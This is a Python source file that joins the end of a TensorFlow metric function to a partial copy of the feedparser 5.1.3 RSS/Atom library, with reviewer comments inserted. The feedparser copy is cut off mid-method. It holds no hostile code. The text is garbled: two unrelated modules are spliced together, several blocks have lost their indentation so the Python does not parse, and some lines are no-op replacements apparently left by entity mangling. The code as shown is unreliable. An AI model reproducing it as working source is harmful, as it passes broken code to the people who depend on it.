    def compute_specificity_at_sensitivity(tp, tn, fp, fn, name):
      """Computes the specificity at the given sensitivity.

      Args:
        tp: True positives.
        tn: True negatives.
        fp: False positives.
        fn: False negatives.
        name: The name of the operation.

      Returns:
        The specificity using the aggregated values.
      """
      # Per-threshold sensitivity (recall); kepsilon guards against 0/0.
      sensitivities = math_ops.div(tp, tp + fn + kepsilon)
      # We'll need to use this trick until tf.argmax allows us to specify
      # whether we should use the first or last index in case of ties.
      # The cumsum over the tie indicator makes argmax select the LAST
      # threshold whose sensitivity is closest to the target.
      min_val = math_ops.reduce_min(math_ops.abs(sensitivities - sensitivity))
      indices_at_minval = math_ops.equal(
          math_ops.abs(sensitivities - sensitivity), min_val)
      indices_at_minval = math_ops.to_int64(indices_at_minval)
      indices_at_minval = math_ops.cumsum(indices_at_minval)
      tf_index = math_ops.argmax(indices_at_minval, 0)
      tf_index = math_ops.cast(tf_index, dtypes.int32)
      # Now, we have the implicit threshold, so compute the specificity:
      return math_ops.div(tn[tf_index], tn[tf_index] + fp[tf_index] + kepsilon,
                          name)
    def specificity_across_replicas(_, values):
      return compute_specificity_at_sensitivity(
          values['tp'], values['tn'], values['fp'], values['fn'], 'value')
    specificity = _aggregate_across_replicas(
        metrics_collections, specificity_across_replicas, values)
    update_op = compute_specificity_at_sensitivity(
        update_ops['tp'], update_ops['tn'], update_ops['fp'], update_ops['fn'],
        'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return specificity, update_op
# ---------------------------------------------------------------------------
# NOTE(review): the lines that stood here ("| unknown | codeparrot/..." )
# were dataset-join residue, not source code. Everything below this marker
# is a separate module (a copy of the feedparser library).
# ---------------------------------------------------------------------------
"""Universal feed parser
Handles RSS 0.9x, RSS 1.0, RSS 2.0, CDF, Atom 0.3, and Atom 1.0 feeds
Visit https://code.google.com/p/feedparser/ for the latest version
Visit http://packages.python.org/feedparser/ for the latest documentation
Required: Python 2.4 or later
Recommended: iconv_codec <http://cjkpython.i18n.org/>
"""
__version__ = "5.1.3"
__license__ = """
Copyright (c) 2010-2013 Kurt McKee <contactme@kurtmckee.org>
Copyright (c) 2002-2008 Mark Pilgrim
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
__author__ = "Mark Pilgrim <http://diveintomark.org/>"
__contributors__ = ["Jason Diamond <http://injektilo.org/>",
"John Beimler <http://john.beimler.org/>",
"Fazal Majid <http://www.majid.info/mylos/weblog/>",
"Aaron Swartz <http://aaronsw.com/>",
"Kevin Marks <http://epeus.blogspot.com/>",
"Sam Ruby <http://intertwingly.net/>",
"Ade Oshineye <http://blog.oshineye.com/>",
"Martin Pool <http://sourcefrog.net/>",
"Kurt McKee <http://kurtmckee.org/>",
"Bernd Schlapsi <https://github.com/brot>",]
# HTTP "User-Agent" header to send to servers when downloading feeds.
# If you are embedding feedparser in a larger application, you should
# change this to your application name and URL.
USER_AGENT = "UniversalFeedParser/%s +https://code.google.com/p/feedparser/" % __version__
# HTTP "Accept" header to send to servers when downloading feeds. If you don't
# want to send an Accept header, set this to None.
# (The q-values bias content negotiation toward real feed media types over
# generic XML, with */* as a last resort.)
ACCEPT_HEADER = "application/atom+xml,application/rdf+xml,application/rss+xml,application/x-netcdf,application/xml;q=0.9,text/xml;q=0.2,*/*;q=0.1"
# List of preferred XML parsers, by SAX driver name. These will be tried first,
# but if they're not installed, Python will keep searching through its own list
# of pre-installed parsers until it finds one that supports everything we need.
PREFERRED_XML_PARSERS = ["drv_libxml2"]
# If you want feedparser to automatically resolve all relative URIs, set this
# to 1.
RESOLVE_RELATIVE_URIS = 1
# If you want feedparser to automatically sanitize all potentially unsafe
# HTML content, set this to 1.
SANITIZE_HTML = 1
# ---------- Python 3 modules (make it work if possible) ----------
# rfc822 was removed in Python 3; email._parseaddr carries a close-enough
# subset of its address/date parsing API.
try:
    import rfc822
except ImportError:
    from email import _parseaddr as rfc822
#try:
#    # Python 3.1 introduces bytes.maketrans and simultaneously
#    # deprecates string.maketrans; use bytes.maketrans if possible
#    _maketrans = bytes.maketrans
#except (NameError, AttributeError):
# NOTE(review): the bytes.maketrans branch above has been commented out in
# this copy, pinning the module to Python 2's string.maketrans.
import string
_maketrans = string.maketrans
# base64 support for Atom feeds that contain embedded binary data
try:
    import base64, binascii
except ImportError:
    base64 = binascii = None
else:
    # Python 3.1 deprecates decodestring in favor of decodebytes; the
    # portable getattr() form has likewise been commented out here,
    # pinning this copy to the Python 2 spelling.
    #_base64decode = getattr(base64, 'decodebytes', base64.decodestring)
    _base64decode = base64.decodestring
# _s2bytes: convert a UTF-8 str to bytes if the interpreter is Python 3
# _l2bytes: convert a list of ints to bytes if the interpreter is Python 3
#try:
# if bytes is str:
# # In Python 2.5 and below, bytes doesn't exist (NameError)
# # In Python 2.6 and above, bytes and str are the same type
# raise NameError
#except NameError:
# Python 2
def _s2bytes(s):
return s
def _l2bytes(l):
return ''.join(map(chr, l))
#else:
# # Python 3
# def _s2bytes(s):
# return bytes(s, 'utf8')
# def _l2bytes(l):
# return bytes(l)
# If you want feedparser to allow all URL schemes, set this to ()
# List culled from Python's urlparse documentation at:
# http://docs.python.org/library/urlparse.html
# as well as from "URI scheme" at Wikipedia:
# https://secure.wikimedia.org/wikipedia/en/wiki/URI_scheme
# Many more will likely need to be added!
# NOTE(review): 'mms' and 'svn' appear in both groups below; duplicates are
# harmless for membership tests but could be removed.
ACCEPTABLE_URI_SCHEMES = (
    'file', 'ftp', 'gopher', 'h323', 'hdl', 'http', 'https', 'imap', 'magnet',
    'mailto', 'mms', 'news', 'nntp', 'prospero', 'rsync', 'rtsp', 'rtspu',
    'sftp', 'shttp', 'sip', 'sips', 'snews', 'svn', 'svn+ssh', 'telnet',
    'wais',
    # Additional common-but-unofficial schemes
    'aim', 'callto', 'cvs', 'facetime', 'feed', 'git', 'gtalk', 'irc', 'ircs',
    'irc6', 'itms', 'mms', 'msnim', 'skype', 'ssh', 'smb', 'svn', 'ymsg',
)
#ACCEPTABLE_URI_SCHEMES = ()
# ---------- required modules (should come with any Python distribution) ----------
import cgi
import codecs
import copy
import datetime
import itertools
import re
import struct
import time
import types
import urllib
import urllib2
import urlparse
import warnings
from htmlentitydefs import name2codepoint, codepoint2name, entitydefs
try:
from io import BytesIO as _StringIO
except ImportError:
try:
from cStringIO import StringIO as _StringIO
except ImportError:
from StringIO import StringIO as _StringIO
# ---------- optional modules (feedparser will work without these, but with reduced functionality) ----------
# gzip is included with most Python distributions, but may not be available if you compiled your own
try:
import gzip
except ImportError:
gzip = None
try:
import zlib
except ImportError:
zlib = None
# If a real XML parser is available, feedparser will attempt to use it. feedparser has
# been tested with the built-in SAX parser and libxml2. On platforms where the
# Python distribution does not come with an XML parser (such as Mac OS X 10.2 and some
# versions of FreeBSD), feedparser will quietly fall back on regex-based parsing.
try:
    import xml.sax
    from xml.sax.saxutils import escape as _xmlescape
except ImportError:
    _XML_AVAILABLE = 0
    def _xmlescape(data, entities={}):
        """Minimal stand-in for xml.sax.saxutils.escape.

        Escapes '&', '<' and '>' to their XML character entities, then
        applies any extra (char, entity) replacement pairs from `entities`.
        Note: `entities` is iterated directly, so it must be a sequence of
        pairs (iterating a plain dict would yield bare keys).
        """
        # BUG FIX: these three replacements were self-replacements
        # ('&'->'&', '>'->'>', '<'->'<' -- no-ops, apparently the result of
        # HTML-entity decoding mangling the source). Restore real escaping;
        # '&' must be escaped first so it doesn't re-escape '&gt;'/'&lt;'.
        data = data.replace('&', '&amp;')
        data = data.replace('>', '&gt;')
        data = data.replace('<', '&lt;')
        for char, entity in entities:
            data = data.replace(char, entity)
        return data
else:
    try:
        xml.sax.make_parser(PREFERRED_XML_PARSERS) # test for valid parsers
    except xml.sax.SAXReaderNotAvailable:
        _XML_AVAILABLE = 0
    else:
        _XML_AVAILABLE = 1
# sgmllib is not available by default in Python 3; if the end user doesn't have
# it available then we'll lose illformed XML parsing and content santizing
try:
    import sgmllib
except ImportError:
    # This is probably Python 3, which doesn't include sgmllib anymore
    _SGML_AVAILABLE = 0
    # Mock sgmllib enough to allow subclassing later on
    class sgmllib(object):
        class SGMLParser(object):
            def goahead(self, i):
                pass
            def parse_starttag(self, i):
                pass
else:
    _SGML_AVAILABLE = 1
    # sgmllib defines a number of module-level regular expressions that are
    # insufficient for the XML parsing feedparser needs. Rather than modify
    # the variables directly in sgmllib, they're defined here using the same
    # names, and the compiled code objects of several sgmllib.SGMLParser
    # methods are copied into _BaseHTMLProcessor so that they execute in
    # feedparser's scope instead of sgmllib's scope.
    charref = re.compile('&#(\d+|[xX][0-9a-fA-F]+);')
    tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
    attrfind = re.compile(
        r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)[$]?(\s*=\s*'
        r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?'
    )
    # Unfortunately, these must be copied over to prevent NameError exceptions
    entityref = sgmllib.entityref
    incomplete = sgmllib.incomplete
    interesting = sgmllib.interesting
    shorttag = sgmllib.shorttag
    shorttagopen = sgmllib.shorttagopen
    starttagopen = sgmllib.starttagopen
    class _EndBracketRegEx:
        def __init__(self):
            # Overriding the built-in sgmllib.endbracket regex allows the
            # parser to find angle brackets embedded in element attributes.
            self.endbracket = re.compile('''([^'"<>]|"[^"]*"(?=>|/|\s|\w+=)|'[^']*'(?=>|/|\s|\w+=))*(?=[<>])|.*?(?=[<>])''')
        def search(self, target, index=0):
            match = self.endbracket.match(target, index)
            if match is not None:
                # Returning a new object in the calling thread's context
                # resolves a thread-safety issue.
                return EndBracketMatch(match)
            return None
    class EndBracketMatch:
        def __init__(self, match):
            self.match = match
        def start(self, n):
            # NOTE(review): intentionally returns the END of group n; the
            # sgmllib caller treats it as the bracket position. Looks
            # deliberate, but verify against sgmllib's use of endbracket.
            return self.match.end(n)
    endbracket = _EndBracketRegEx()
# iconv_codec provides support for more character encodings.
# It's available from http://cjkpython.i18n.org/
#try:
#    import iconv_codec
#except ImportError:
#    pass
# chardet library auto-detects character encodings
# Download from http://chardet.feedparser.org/
#try:
#    import chardet
#except ImportError:
# NOTE(review): the chardet import is commented out in this copy, so
# detection is unconditionally disabled; a None value presumably lets
# later code feature-test `chardet` truthiness without an ImportError.
chardet = None
# ---------- don't touch these ----------
class ThingsNobodyCaresAboutButMe(Exception):
    """Root of the non-fatal, informational exception family."""

class CharacterEncodingOverride(ThingsNobodyCaresAboutButMe):
    """Signals that the declared character encoding was overridden."""

class CharacterEncodingUnknown(ThingsNobodyCaresAboutButMe):
    """Signals that no usable character encoding could be determined."""

class NonXMLContentType(ThingsNobodyCaresAboutButMe):
    """Signals that the served Content-Type was not an XML media type."""

class UndeclaredNamespace(Exception):
    """Raised when a namespace prefix is used without a declaration."""
# Human-readable names for every feed format/version identifier the parser
# can report; the empty-string key means the format could not be determined.
SUPPORTED_VERSIONS = {'': u'unknown',
                      'rss090': u'RSS 0.90',
                      'rss091n': u'RSS 0.91 (Netscape)',
                      'rss091u': u'RSS 0.91 (Userland)',
                      'rss092': u'RSS 0.92',
                      'rss093': u'RSS 0.93',
                      'rss094': u'RSS 0.94',
                      'rss20': u'RSS 2.0',
                      'rss10': u'RSS 1.0',
                      'rss': u'RSS (unknown version)',
                      'atom01': u'Atom 0.1',
                      'atom02': u'Atom 0.2',
                      'atom03': u'Atom 0.3',
                      'atom10': u'Atom 1.0',
                      'atom': u'Atom (unknown version)',
                      'cdf': u'CDF',
                      }
class FeedParserDict(dict):
    """Dictionary with attribute access and legacy feed-element aliasing.

    Feed elements were renamed across RSS/Atom revisions; `keymap` maps each
    legacy name to its canonical equivalent (or to a list of candidate
    canonical names tried in order).  A few keys ('category', 'enclosures',
    'license') are computed from other stored values rather than stored
    directly.  Attribute access (d.title) falls through to item access.
    """

    # legacy key -> canonical key, or list of canonical candidates
    keymap = {'channel': 'feed',
              'items': 'entries',
              'guid': 'id',
              'date': 'updated',
              'date_parsed': 'updated_parsed',
              'description': ['summary', 'subtitle'],
              'description_detail': ['summary_detail', 'subtitle_detail'],
              'url': ['href'],
              'modified': 'updated',
              'modified_parsed': 'updated_parsed',
              'issued': 'published',
              'issued_parsed': 'published_parsed',
              'copyright': 'rights',
              'copyright_detail': 'rights_detail',
              'tagline': 'subtitle',
              'tagline_detail': 'subtitle_detail'}

    def __getitem__(self, key):
        """Return the value for `key`, resolving aliases and computed keys."""
        if key == 'category':
            # 'category' is synthesized from the first entry in 'tags'.
            try:
                return dict.__getitem__(self, 'tags')[0]['term']
            except IndexError:
                # BUG FIX: was the Python-2-only `raise KeyError, "..."`
                # form; the parenthesized form is valid in both 2 and 3.
                raise KeyError("object doesn't have key 'category'")
        elif key == 'enclosures':
            # Enclosure links, with their redundant rel attribute stripped.
            norel = lambda link: FeedParserDict([(name, value) for (name, value) in link.items() if name != 'rel'])
            return [norel(link) for link in dict.__getitem__(self, 'links') if link['rel'] == u'enclosure']
        elif key == 'license':
            # First license link that carries an href; if none is found,
            # control falls through to the plain lookup below (KeyError).
            for link in dict.__getitem__(self, 'links'):
                if link['rel'] == u'license' and 'href' in link:
                    return link['href']
        elif key == 'updated':
            # Temporarily help developers out by keeping the old
            # broken behavior that was reported in issue 310.
            # This fix was proposed in issue 328.
            if not dict.__contains__(self, 'updated') and \
                    dict.__contains__(self, 'published'):
                warnings.warn("To avoid breaking existing software while "
                    "fixing issue 310, a temporary mapping has been created "
                    "from `updated` to `published` if `updated` doesn't "
                    "exist. This fallback will be removed in a future version "
                    "of feedparser.", DeprecationWarning)
                return dict.__getitem__(self, 'published')
            return dict.__getitem__(self, 'updated')
        elif key == 'updated_parsed':
            if not dict.__contains__(self, 'updated_parsed') and \
                    dict.__contains__(self, 'published_parsed'):
                warnings.warn("To avoid breaking existing software while "
                    "fixing issue 310, a temporary mapping has been created "
                    "from `updated_parsed` to `published_parsed` if "
                    "`updated_parsed` doesn't exist. This fallback will be "
                    "removed in a future version of feedparser.",
                    DeprecationWarning)
                return dict.__getitem__(self, 'published_parsed')
            return dict.__getitem__(self, 'updated_parsed')
        else:
            realkey = self.keymap.get(key, key)
            if isinstance(realkey, list):
                for k in realkey:
                    if dict.__contains__(self, k):
                        return dict.__getitem__(self, k)
            elif dict.__contains__(self, realkey):
                return dict.__getitem__(self, realkey)
        return dict.__getitem__(self, key)

    def __contains__(self, key):
        if key in ('updated', 'updated_parsed'):
            # Membership reflects only the literal key, not the
            # published->updated fallback above (issue 310 compatibility).
            return dict.__contains__(self, key)
        try:
            self.__getitem__(key)
        except KeyError:
            return False
        else:
            return True

    has_key = __contains__  # Python 2 compatibility alias

    def get(self, key, default=None):
        """dict.get that honors the alias logic in __getitem__."""
        try:
            return self.__getitem__(key)
        except KeyError:
            return default

    def __setitem__(self, key, value):
        # Store under the canonical name; a list-valued alias stores under
        # its first candidate.
        key = self.keymap.get(key, key)
        if isinstance(key, list):
            key = key[0]
        return dict.__setitem__(self, key, value)

    def setdefault(self, key, value):
        if key not in self:
            self[key] = value
            return value
        return self[key]

    def __getattr__(self, key):
        # __getattribute__() is called first; this will be called
        # only if an attribute was not already found
        try:
            return self.__getitem__(key)
        except KeyError:
            # BUG FIX: was the Python-2-only `raise AttributeError, "..."`
            # form; the parenthesized form is valid in both 2 and 3.
            raise AttributeError("object has no attribute '%s'" % key)

    def __hash__(self):
        # Identity hash despite being a mutable dict — presumably relied
        # on elsewhere in feedparser; verify before changing.
        return id(self)
# Windows-1252 code points 0x80-0x9F mapped to their Unicode equivalents.
# Bytes in this range are control characters in ISO-8859-1 but printable
# characters in cp1252, and feeds frequently mislabel one encoding as the
# other; this table presumably backs a cp1252 fix-up at a call site outside
# this chunk. Code points 129, 141, 143, 144 and 157 are undefined in
# cp1252 and are deliberately absent.
_cp1252 = {
    128: unichr(8364), # euro sign
    130: unichr(8218), # single low-9 quotation mark
    131: unichr( 402), # latin small letter f with hook
    132: unichr(8222), # double low-9 quotation mark
    133: unichr(8230), # horizontal ellipsis
    134: unichr(8224), # dagger
    135: unichr(8225), # double dagger
    136: unichr( 710), # modifier letter circumflex accent
    137: unichr(8240), # per mille sign
    138: unichr( 352), # latin capital letter s with caron
    139: unichr(8249), # single left-pointing angle quotation mark
    140: unichr( 338), # latin capital ligature oe
    142: unichr( 381), # latin capital letter z with caron
    145: unichr(8216), # left single quotation mark
    146: unichr(8217), # right single quotation mark
    147: unichr(8220), # left double quotation mark
    148: unichr(8221), # right double quotation mark
    149: unichr(8226), # bullet
    150: unichr(8211), # en dash
    151: unichr(8212), # em dash
    152: unichr( 732), # small tilde
    153: unichr(8482), # trade mark sign
    154: unichr( 353), # latin small letter s with caron
    155: unichr(8250), # single right-pointing angle quotation mark
    156: unichr( 339), # latin small ligature oe
    158: unichr( 382), # latin small letter z with caron
    159: unichr( 376), # latin capital letter y with diaeresis
}
_urifixer = re.compile('^([A-Za-z][A-Za-z0-9+-.]*://)(/*)(.*?)')
def _urljoin(base, uri):
    """Join `uri` against `base`, returning a unicode result ('' on error)."""
    # Collapse slashes that immediately follow the scheme's '://' so the
    # join doesn't misread them as the start of a new path/authority.
    uri = _urifixer.sub(r'\1\3', uri)
    if not isinstance(uri, unicode):
        uri = uri.decode('utf-8', 'ignore')
    try:
        joined = urlparse.urljoin(base, uri)
    except ValueError:
        joined = u''
    if isinstance(joined, unicode):
        return joined
    return joined.decode('utf-8', 'ignore')
class _FeedParserMixin:
namespaces = {
'': '',
'http://backend.userland.com/rss': '',
'http://blogs.law.harvard.edu/tech/rss': '',
'http://purl.org/rss/1.0/': '',
'http://my.netscape.com/rdf/simple/0.9/': '',
'http://example.com/newformat#': '',
'http://example.com/necho': '',
'http://purl.org/echo/': '',
'uri/of/echo/namespace#': '',
'http://purl.org/pie/': '',
'http://purl.org/atom/ns#': '',
'http://www.w3.org/2005/Atom': '',
'http://purl.org/rss/1.0/modules/rss091#': '',
'http://webns.net/mvcb/': 'admin',
'http://purl.org/rss/1.0/modules/aggregation/': 'ag',
'http://purl.org/rss/1.0/modules/annotate/': 'annotate',
'http://media.tangent.org/rss/1.0/': 'audio',
'http://backend.userland.com/blogChannelModule': 'blogChannel',
'http://web.resource.org/cc/': 'cc',
'http://backend.userland.com/creativeCommonsRssModule': 'creativeCommons',
'http://purl.org/rss/1.0/modules/company': 'co',
'http://purl.org/rss/1.0/modules/content/': 'content',
'http://my.theinfo.org/changed/1.0/rss/': 'cp',
'http://purl.org/dc/elements/1.1/': 'dc',
'http://purl.org/dc/terms/': 'dcterms',
'http://purl.org/rss/1.0/modules/email/': 'email',
'http://purl.org/rss/1.0/modules/event/': 'ev',
'http://rssnamespace.org/feedburner/ext/1.0': 'feedburner',
'http://freshmeat.net/rss/fm/': 'fm',
'http://xmlns.com/foaf/0.1/': 'foaf',
'http://www.w3.org/2003/01/geo/wgs84_pos#': 'geo',
'http://www.georss.org/georss': 'georss',
'http://www.opengis.net/gml': 'gml',
'http://postneo.com/icbm/': 'icbm',
'http://purl.org/rss/1.0/modules/image/': 'image',
'http://www.itunes.com/DTDs/PodCast-1.0.dtd': 'itunes',
'http://example.com/DTDs/PodCast-1.0.dtd': 'itunes',
'http://purl.org/rss/1.0/modules/link/': 'l',
'http://search.yahoo.com/mrss': 'media',
# Version 1.1.2 of the Media RSS spec added the trailing slash on the namespace
'http://search.yahoo.com/mrss/': 'media',
'http://madskills.com/public/xml/rss/module/pingback/': 'pingback',
'http://prismstandard.org/namespaces/1.2/basic/': 'prism',
'http://www.w3.org/1999/02/22-rdf-syntax-ns#': 'rdf',
'http://www.w3.org/2000/01/rdf-schema#': 'rdfs',
'http://purl.org/rss/1.0/modules/reference/': 'ref',
'http://purl.org/rss/1.0/modules/richequiv/': 'reqv',
'http://purl.org/rss/1.0/modules/search/': 'search',
'http://purl.org/rss/1.0/modules/slash/': 'slash',
'http://schemas.xmlsoap.org/soap/envelope/': 'soap',
'http://purl.org/rss/1.0/modules/servicestatus/': 'ss',
'http://hacks.benhammersley.com/rss/streaming/': 'str',
'http://purl.org/rss/1.0/modules/subscription/': 'sub',
'http://purl.org/rss/1.0/modules/syndication/': 'sy',
'http://schemas.pocketsoap.com/rss/myDescModule/': 'szf',
'http://purl.org/rss/1.0/modules/taxonomy/': 'taxo',
'http://purl.org/rss/1.0/modules/threading/': 'thr',
'http://purl.org/rss/1.0/modules/textinput/': 'ti',
'http://madskills.com/public/xml/rss/module/trackback/': 'trackback',
'http://wellformedweb.org/commentAPI/': 'wfw',
'http://purl.org/rss/1.0/modules/wiki/': 'wiki',
'http://www.w3.org/1999/xhtml': 'xhtml',
'http://www.w3.org/1999/xlink': 'xlink',
'http://www.w3.org/XML/1998/namespace': 'xml',
'http://podlove.org/simple-chapters': 'psc',
}
_matchnamespaces = {}
can_be_relative_uri = set(['link', 'id', 'wfw_comment', 'wfw_commentrss', 'docs', 'url', 'href', 'comments', 'icon', 'logo'])
can_contain_relative_uris = set(['content', 'title', 'summary', 'info', 'tagline', 'subtitle', 'copyright', 'rights', 'description'])
can_contain_dangerous_markup = set(['content', 'title', 'summary', 'info', 'tagline', 'subtitle', 'copyright', 'rights', 'description'])
html_types = [u'text/html', u'application/xhtml+xml']
    def __init__(self, baseuri=None, baselang=None, encoding=u'utf-8'):
        """Initialize per-document parser state.

        baseuri/baselang seed xml:base and xml:lang resolution; encoding is
        the character encoding used when byte strings must be decoded.
        """
        if not self._matchnamespaces:
            # build the class-level lowercase namespace lookup exactly once
            for k, v in self.namespaces.items():
                self._matchnamespaces[k.lower()] = v
        self.feeddata = FeedParserDict() # feed-level data
        self.encoding = encoding # character encoding
        self.entries = [] # list of entry-level data
        self.version = u'' # feed type/version, see SUPPORTED_VERSIONS
        self.namespacesInUse = {} # dictionary of namespaces defined by the feed
        # the following are used internally to track state;
        # this is really out of control and should be refactored
        self.infeed = 0
        self.inentry = 0
        self.incontent = 0
        self.intextinput = 0
        self.inimage = 0
        self.inauthor = 0
        self.incontributor = 0
        self.inpublisher = 0
        self.insource = 0
        # georss
        self.ingeometry = 0
        self.sourcedata = FeedParserDict()
        self.contentparams = FeedParserDict()
        self._summaryKey = None
        self.namespacemap = {}
        self.elementstack = []
        self.basestack = []
        self.langstack = []
        self.baseuri = baseuri or u''
        self.lang = baselang or None
        self.svgOK = 0
        self.title_depth = -1
        self.depth = 0
        # psc_chapters_flag prevents multiple psc_chapters from being
        # captured in a single entry or item. The transition states are
        # None -> True -> False. psc_chapter elements will only be
        # captured while it is True.
        self.psc_chapters_flag = None
        if baselang:
            self.feeddata['language'] = baselang.replace('_','-')
        # A map of the following form:
        #     {
        #         object_that_value_is_set_on: {
        #             property_name: depth_of_node_property_was_extracted_from,
        #             other_property: depth_of_node_property_was_extracted_from,
        #         },
        #     }
        self.property_depth_map = {}
def _normalize_attributes(self, kv):
k = kv[0].lower()
v = k in ('rel', 'type') and kv[1].lower() or kv[1]
# the sgml parser doesn't handle entities in attributes, nor
# does it pass the attribute values through as unicode, while
# strict xml parsers do -- account for this difference
if isinstance(self, _LooseFeedParser):
v = v.replace('&', '&')
if not isinstance(v, unicode):
v = v.decode('utf-8')
return (k, v)
    def unknown_starttag(self, tag, attrs):
        """Dispatch an opening tag to its `_start_<prefix>_<name>` handler.

        Also tracks xml:base / xml:lang scoping, xmlns declarations, and
        reconstructs inline XHTML content as escaped markup.
        """
        # increment depth counter
        self.depth += 1
        # normalize attrs
        attrs = map(self._normalize_attributes, attrs)
        # track xml:base and xml:lang
        attrsD = dict(attrs)
        baseuri = attrsD.get('xml:base', attrsD.get('base')) or self.baseuri
        if not isinstance(baseuri, unicode):
            baseuri = baseuri.decode(self.encoding, 'ignore')
        # ensure that self.baseuri is always an absolute URI that
        # uses a whitelisted URI scheme (e.g. not `javascript:`)
        if self.baseuri:
            self.baseuri = _makeSafeAbsoluteURI(self.baseuri, baseuri) or self.baseuri
        else:
            self.baseuri = _urljoin(self.baseuri, baseuri)
        lang = attrsD.get('xml:lang', attrsD.get('lang'))
        if lang == '':
            # xml:lang could be explicitly set to '', we need to capture that
            lang = None
        elif lang is None:
            # if no xml:lang is specified, use parent lang
            lang = self.lang
        if lang:
            if tag in ('feed', 'rss', 'rdf:RDF'):
                self.feeddata['language'] = lang.replace('_','-')
        self.lang = lang
        self.basestack.append(self.baseuri)
        self.langstack.append(lang)
        # track namespaces
        for prefix, uri in attrs:
            if prefix.startswith('xmlns:'):
                self.trackNamespace(prefix[6:], uri)
            elif prefix == 'xmlns':
                self.trackNamespace(None, uri)
        # track inline content
        if self.incontent and not self.contentparams.get('type', u'xml').endswith(u'xml'):
            if tag in ('xhtml:div', 'div'):
                return # typepad does this 10/2007
            # element declared itself as escaped markup, but it isn't really
            self.contentparams['type'] = u'application/xhtml+xml'
        if self.incontent and self.contentparams.get('type') == u'application/xhtml+xml':
            if tag.find(':') <> -1:
                prefix, tag = tag.split(':', 1)
                namespace = self.namespacesInUse.get(prefix, '')
                if tag=='math' and namespace=='http://www.w3.org/1998/Math/MathML':
                    attrs.append(('xmlns',namespace))
                if tag=='svg' and namespace=='http://www.w3.org/2000/svg':
                    attrs.append(('xmlns',namespace))
            if tag == 'svg':
                self.svgOK += 1
            # re-serialize inline XHTML as text of the enclosing element
            return self.handle_data('<%s%s>' % (tag, self.strattrs(attrs)), escape=0)
        # match namespaces
        if tag.find(':') <> -1:
            prefix, suffix = tag.split(':', 1)
        else:
            prefix, suffix = '', tag
        prefix = self.namespacemap.get(prefix, prefix)
        if prefix:
            prefix = prefix + '_'
        # special hack for better tracking of empty textinput/image elements in illformed feeds
        if (not prefix) and tag not in ('title', 'link', 'description', 'name'):
            self.intextinput = 0
        if (not prefix) and tag not in ('title', 'link', 'description', 'url', 'href', 'width', 'height'):
            self.inimage = 0
        # call special handler (if defined) or default handler
        methodname = '_start_' + prefix + suffix
        try:
            method = getattr(self, methodname)
            return method(attrsD)
        except AttributeError:
            # Since there's no handler or something has gone wrong we explicitly add the element and its attributes
            unknown_tag = prefix + suffix
            if len(attrsD) == 0:
                # No attributes so merge it into the enclosing dictionary
                return self.push(unknown_tag, 1)
            else:
                # Has attributes so create it in its own dictionary
                context = self._getContext()
                context[unknown_tag] = attrsD
    def unknown_endtag(self, tag):
        """Dispatch a closing tag to its `_end_*` handler and unwind scopes."""
        # match namespaces
        if tag.find(':') <> -1:
            prefix, suffix = tag.split(':', 1)
        else:
            prefix, suffix = '', tag
        prefix = self.namespacemap.get(prefix, prefix)
        if prefix:
            prefix = prefix + '_'
        if suffix == 'svg' and self.svgOK:
            self.svgOK -= 1
        # call special handler (if defined) or default handler
        methodname = '_end_' + prefix + suffix
        try:
            if self.svgOK:
                # while inside inline SVG, skip the special handlers entirely
                raise AttributeError()
            method = getattr(self, methodname)
            method()
        except AttributeError:
            self.pop(prefix + suffix)
        # track inline content
        if self.incontent and not self.contentparams.get('type', u'xml').endswith(u'xml'):
            # element declared itself as escaped markup, but it isn't really
            if tag in ('xhtml:div', 'div'):
                return # typepad does this 10/2007
            self.contentparams['type'] = u'application/xhtml+xml'
        if self.incontent and self.contentparams.get('type') == u'application/xhtml+xml':
            tag = tag.split(':')[-1]
            self.handle_data('</%s>' % tag, escape=0)
        # track xml:base and xml:lang going out of scope
        if self.basestack:
            self.basestack.pop()
            if self.basestack and self.basestack[-1]:
                self.baseuri = self.basestack[-1]
        if self.langstack:
            self.langstack.pop()
            if self.langstack: # and (self.langstack[-1] is not None):
                self.lang = self.langstack[-1]
        self.depth -= 1
    def handle_charref(self, ref):
        # called for each character reference, e.g. for '&#160;', ref will be '160'
        if not self.elementstack:
            return
        ref = ref.lower()
        if ref in ('34', '38', '39', '60', '62', 'x22', 'x26', 'x27', 'x3c', 'x3e'):
            # these decode to ", &, ', < and > -- keep them escaped so
            # embedded markup survives re-parsing later
            text = '&#%s;' % ref
        else:
            if ref[0] == 'x':
                c = int(ref[1:], 16)
            else:
                c = int(ref)
            text = unichr(c).encode('utf-8')
        self.elementstack[-1][2].append(text)
    def handle_entityref(self, ref):
        # called for each entity reference, e.g. for '&copy;', ref will be 'copy'
        if not self.elementstack:
            return
        if ref in ('lt', 'gt', 'quot', 'amp', 'apos'):
            # XML's own five predefined entities stay escaped
            text = '&%s;' % ref
        elif ref in self.entities:
            # entity declared in the document's internal DTD subset
            text = self.entities[ref]
            if text.startswith('&#') and text.endswith(';'):
                return self.handle_entityref(text)
        else:
            try:
                name2codepoint[ref]
            except KeyError:
